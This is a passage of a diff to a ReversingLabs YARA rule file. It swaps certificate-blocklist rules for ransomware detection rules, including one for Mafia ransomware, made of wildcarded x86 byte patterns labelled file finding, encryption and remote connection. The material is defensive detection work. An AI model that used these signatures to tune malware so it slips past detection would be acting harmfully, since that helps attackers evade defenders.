?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? + 75 ?? 53 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F + 5E 5B C9 C3 + } + $encrypt_files_1 = { + 8A 45 ?? 04 ?? 66 98 66 89 45 ?? 0F B7 C0 50 8D 45 ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 68 + ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 FF D0 8B F0 83 FE ?? 74 ?? 83 + FE ?? 74 ?? 83 FE ?? 75 ?? FF 75 ?? 8D 45 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? 83 FE ?? 74 ?? 83 FE ?? 75 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 57 6A ?? E8 ?? ?? ?? + ?? 59 59 68 ?? ?? ?? ?? FF D0 FF 45 ?? 83 7D ?? ?? 0F 8C ?? ?? ?? ?? 83 3D ?? ?? ?? + ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 BE + ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 53 53 8D 8D ?? ?? ?? ?? 51 53 FF D0 8D 85 + ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 + ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? + 75 ?? E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 FF D0 56 6A + ?? E8 ?? ?? ?? ?? 59 59 53 6A ?? 8D 8D ?? ?? ?? ?? 51 53 FF D0 8D 85 ?? ?? ?? ?? 50 + 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 + C4 ?? 6A ?? 53 53 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 53 FF D0 57 6A ?? E8 ?? ?? ?? + ?? 59 59 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 FF D0 5F + 5E 33 C0 5B C9 C2 + } + $encrypt_files_2 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 33 DB 66 A5 53 8D + 45 ?? 53 50 A4 E8 ?? ?? ?? ?? 59 50 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7D ?? A5 A5 89 + 45 ?? 8D 45 ?? 50 66 A5 E8 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A + ?? 89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 FF D0 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 66 A5 BE + ?? ?? ?? ?? 8D 7D ?? A5 A5 A5 53 89 45 ?? 8D 45 ?? 53 50 66 A5 E8 ?? ?? ?? ?? 59 50 + E8 ?? ?? ?? ?? 8B F0 8D 45 ?? 50 E8 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 6A ?? 8D 8D ?? ?? ?? ?? 51 53 FF D0 BF ?? + ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 55 ?? 68 ?? + ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 8D 8D ?? ?? ?? ?? 51 FF D0 68 ?? ?? ?? ?? + 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 53 53 FF D0 8B F0 53 56 E8 ?? ?? ?? ?? 59 + 59 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 FF + D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF + } + $encrypt_files_3 = { + D0 E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? + ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 85 C0 75 ?? BE ?? ?? ?? + ?? EB ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? FF D0 56 E8 ?? ?? + ?? ?? 59 3C ?? 75 ?? BE ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 68 + ?? ?? ?? ?? FF D0 56 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D0 + E8 ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF + D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF + D0 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? + ?? ?? 83 C4 ?? 53 6A ?? 8D 8D ?? ?? ?? ?? 51 53 FF D0 68 ?? ?? ?? ?? 57 8D 85 ?? ?? + ?? ?? 50 BE ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 FF 55 ?? 68 ?? ?? ?? ?? 57 8D 85 ?? + ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 56 50 FF 55 ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 + C4 ?? 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7D ?? A5 68 ?? ?? ?? + ?? 6A ?? 66 A5 E8 ?? ?? ?? ?? 83 C4 ?? 53 FF D0 6A ?? FF 75 ?? A3 ?? ?? ?? ?? FF 55 + ?? 6A ?? FF 75 ?? 8B F0 FF 55 ?? FF 75 ?? 89 45 ?? 53 E8 ?? ?? ?? ?? 8D 45 ?? 50 FF + } + $encrypt_files_4 = { + 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 66 85 C0 75 ?? 33 C0 40 E9 ?? ?? ?? ?? 8B 3D + ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 8B C8 8B 45 ?? 53 57 99 53 53 + 2B C2 68 ?? ?? ?? ?? D1 F8 2D ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8B C6 99 2B C2 D1 F8 2D + ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 53 FF D1 A3 ?? ?? ?? ?? E8 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? + 8D 8D ?? ?? ?? ?? 51 FF D0 E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 + BE ?? ?? ?? ?? 85 C0 75 ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 53 53 53 68 ?? ?? ?? ?? 53 + 53 FF D0 56 6A ?? E8 ?? ?? ?? ?? 59 59 53 53 53 68 ?? ?? ?? ?? 53 53 FF D0 39 1D ?? + ?? ?? ?? 75 ?? 6A ?? 58 EB ?? 6A ?? 59 33 C0 68 ?? ?? ?? ?? 89 5D ?? 8D 7D ?? 6A ?? + F3 AB E8 ?? ?? ?? ?? 59 59 6A ?? FF D0 EB ?? 83 F8 ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? E8 + ?? ?? ?? ?? 59 59 8D 4D ?? 51 FF D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 8D 4D + ?? 51 FF D0 6A ?? 59 8D 75 ?? BF ?? ?? ?? ?? F3 A5 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? + ?? 59 59 53 53 53 8D 4D ?? 51 FF D0 3B C3 75 ?? 8B 45 ?? 5F 5E 5B C9 C2 ?? ?? 6A ?? + E9 + } + $remote_connection_4 = { + 55 8B EC 51 51 53 56 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 33 F6 56 56 56 6A ?? + 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? 8B D8 E8 ?? ?? ?? ?? 59 59 56 56 6A ?? 56 + 56 6A ?? FF 75 ?? 53 FF D0 68 ?? ?? ?? ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 59 59 56 68 + ?? ?? ?? ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? FF D0 68 ?? ?? ?? + ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 59 59 56 56 56 56 FF 75 ?? FF D0 53 E8 ?? ?? ?? ?? + FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 5E 5B C9 C3 + } + $remote_connection_5 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 33 FF 68 ?? ?? ?? ?? 47 57 E8 ?? ?? ?? ?? 59 59 + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? BE ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 + FF D0 56 57 E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 56 57 E8 + ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 68 ?? ?? ?? ?? 6A ?? E8 + ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? 51 6A ?? FF D0 BE ?? ?? ?? ?? 85 C0 74 ?? 56 57 + E8 ?? ?? ?? ?? 59 59 6A ?? FF D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 6A ?? 57 + 6A ?? FF D0 8B D8 85 DB 7D ?? 56 57 E8 ?? ?? ?? ?? 59 59 6A ?? FF D0 68 ?? ?? ?? ?? + E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 59 6A ?? 8D 4D ?? + 51 FF D0 6A ?? 58 66 89 45 ?? 8B 46 ?? 8B 00 8B 00 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 66 + 89 45 ?? 6A ?? 8D 45 ?? 50 53 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 + ?? 8D 8D ?? ?? ?? ?? 51 FF D0 6A ?? 50 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 53 E8 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? FF D0 5F 5E 5B C9 C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "YNK JAPAN Inc" and pe.signatures[i].serial=="67:24:34:0d:db:c7:25:2f:7f:b7:14:b8:12:a5:c0:4d" and 1306195199<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (($encrypt_files_1 and $remote_connection_1 and $remote_connection_2 and $remote_connection_3) or ($encrypt_files_2 and $encrypt_files_3 and $encrypt_files_4 and $remote_connection_4 and $remote_connection_5)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0813Ee9B7B9D7C46001D6Bc8784Df1Dd : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Mafia : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Mafia ransomware." author = "ReversingLabs" - id = "0915fae0-ac6f-5a92-ab44-80f840fd5061" - date = "2023-11-08" - modified = "2023-11-08" + id = "67f09000-751f-539a-b222-25b1502c2728" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L729-L745" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1a25a2f25fa8d5075113cbafb73e80e741268d6b2f9e629fd54ffca9e82409b0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Mafia.yara#L1-L142" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5c17b799f0b4f1f8f72a2e4203a6606f7783ceec2034694f8a21ff65e5afdb26" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Mafia" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Les Garcons s'habillent" and pe.signatures[i].serial=="08:13:ee:9b:7b:9d:7c:46:00:1d:6b:c8:78:4d:f1:dd" and 1334707199<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_530591C61B5E1212F659138B7Cea0A97 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "71cf0653-5aab-5d5c-aa3a-f42f40196412" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L747-L763" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0ef01e542d145475713bbd373bdcdae5f25bfd823a60e7d40fe9a6b6039c83e0" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files = { + 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? + ?? ?? 53 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 8B F1 6A ?? 50 89 74 24 ?? C7 44 24 ?? ?? + ?? ?? ?? E8 ?? ?? ?? ?? 33 C9 68 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 52 66 89 8C 24 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 66 89 84 + 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? + ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? + 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? + ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 68 ?? ?? ?? ?? 8D + 8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 51 FF D6 B8 ?? ?? + ?? ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 56 81 EC ?? ?? + ?? ?? B9 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 8B FC F3 A5 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? + ?? 8D 54 24 ?? 52 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 44 24 ?? 50 81 EC ?? ?? ?? ?? + B9 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 8B FC F3 A5 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 8D + 4C 24 ?? 51 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? + ?? 5F 5E 5B 33 CC 33 C0 E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $remote_connection_p1 = { + 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 33 C0 57 + 68 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 + ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? + 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 33 C0 68 ?? + ?? ?? ?? 50 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 E8 ?? + ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 33 C0 89 85 + } + $remote_connection_p2 = { + 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? + ?? 66 89 95 ?? ?? ?? ?? 8B 48 ?? 8B 11 8B 02 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D + 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF + 15 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? + 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8B FF 8A 08 40 84 C9 75 ?? 6A + ?? 2B C2 50 8D 8D ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 95 ?? + ?? ?? ?? 52 56 FF D3 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 + C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D7 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 50 + 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF + D7 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D + 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 FF D7 + 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 53 8D 85 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 FF D7 68 ?? ?? ?? ?? 8D 95 + ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 40 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? EB + ?? 68 ?? ?? ?? ?? FF D7 56 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? + 8B E5 5D C3 68 + } + $encrypt_files_p1 = { + 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? + ?? ?? 53 56 8B 75 ?? 57 68 ?? ?? ?? ?? 33 DB 8D 8C 24 ?? ?? ?? ?? 33 C0 53 51 66 89 + 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 54 24 ?? 53 52 89 5C 24 + ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 44 24 ?? 53 50 89 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 + ?? 33 C0 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 89 5C 24 ?? 89 44 24 ?? 89 44 24 + ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? + 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 53 52 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 + ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 53 50 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 + C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 53 52 66 89 8C 24 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B 4D ?? 8B C1 83 C4 ?? 48 74 ?? 48 74 ?? 8B 45 ?? 8B 55 ?? 50 52 51 56 FF + 15 ?? ?? ?? ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2 + } + $encrypt_files_p2 = { + 53 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC 33 C0 E8 ?? ?? ?? ?? 8B E5 + 5D C2 ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? + FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 + ?? ?? ?? ?? 83 C4 ?? 33 F6 E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 79 ?? 48 0D ?? ?? ?? ?? 40 + 88 86 ?? ?? ?? ?? 46 83 FE ?? 7C ?? 33 F6 E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 79 ?? 48 0D + ?? ?? ?? ?? 40 88 86 ?? ?? ?? ?? 46 83 FE ?? 7C ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 49 ?? 0F B6 83 ?? ?? ?? ?? 6A + ?? 8D 94 24 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 94 + 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 ?? 8B C8 + 8A 10 40 84 D2 75 ?? 8D BC 24 ?? ?? ?? ?? 2B C1 8B F1 4F 8A 4F ?? 47 84 C9 75 ?? 8B + C8 C1 E9 ?? F3 A5 8B C8 83 E1 ?? 8D 84 24 ?? ?? ?? ?? F3 A4 8B C8 8A 10 40 84 D2 75 + ?? BF ?? ?? ?? ?? 2B C1 8B F1 4F 8A 4F ?? 47 84 C9 75 ?? 8B C8 C1 E9 ?? F3 A5 8B C8 + } + $encrypt_files_p3 = { + 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 E1 ?? 6A ?? 50 F3 A4 E8 ?? ?? ?? ?? 83 C4 ?? + 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? 43 83 C4 ?? 83 FB ?? 0F + 8C ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? + ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 DB EB ?? 8D A4 24 ?? ?? ?? ?? EB ?? 8D 49 ?? + 0F B6 83 ?? ?? ?? ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C + 24 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? + ?? ?? ?? 83 C4 ?? 8B C8 8A 10 40 84 D2 75 ?? 8D BC 24 ?? ?? ?? ?? 2B C1 8B F1 4F 8A + 4F ?? 47 84 C9 75 ?? 8B C8 C1 E9 ?? F3 A5 8B C8 83 E1 ?? 8D 84 24 ?? ?? ?? ?? F3 A4 + 8B C8 8A 10 40 84 D2 75 ?? BF ?? ?? ?? ?? 2B C1 8B F1 4F 8A 4F ?? 47 84 C9 75 ?? 8B + } + $encrypt_files_p4 = { + C8 C1 E9 ?? F3 A5 8B C8 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 E1 ?? 6A ?? 50 F3 A4 + E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? + 43 83 C4 ?? 83 FB ?? 0F 8C ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? BF ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? + 56 FF D3 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 6A ?? 6A ?? 56 68 ?? ?? ?? ?? + 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 89 44 8C ?? 41 89 4C 24 ?? 47 83 C6 + ?? 83 FF ?? 7E ?? 8B 54 24 ?? 6A ?? 6A ?? 8D 4C 24 ?? 51 52 FF 15 ?? ?? ?? ?? 8D 44 + 24 ?? 50 8D 4C 24 ?? 51 6A ?? 6A ?? 6A 